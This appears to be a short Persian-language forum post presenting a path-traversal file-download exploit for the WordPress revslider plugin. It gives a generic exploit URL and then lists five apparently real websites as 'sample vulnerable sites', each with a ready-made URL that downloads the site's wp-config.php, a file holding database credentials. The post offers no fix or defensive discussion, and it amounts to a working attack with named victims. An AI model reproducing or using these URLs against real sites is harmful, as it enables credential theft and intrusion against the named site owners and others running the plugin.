آسیب پذیری Local File Disclosure/Download در پلاگین revslider وردپرس :
اکسپلویت :
نمونه سایت های آسیب پذیر :
اکسپلویت :
کد:
http://target.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../file.php
کد:
http://www.sorrisniva.no/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://ellipse-tech.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://www.forairmenfez.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://mostmodest.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://ladependancehotel.com/site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
نظر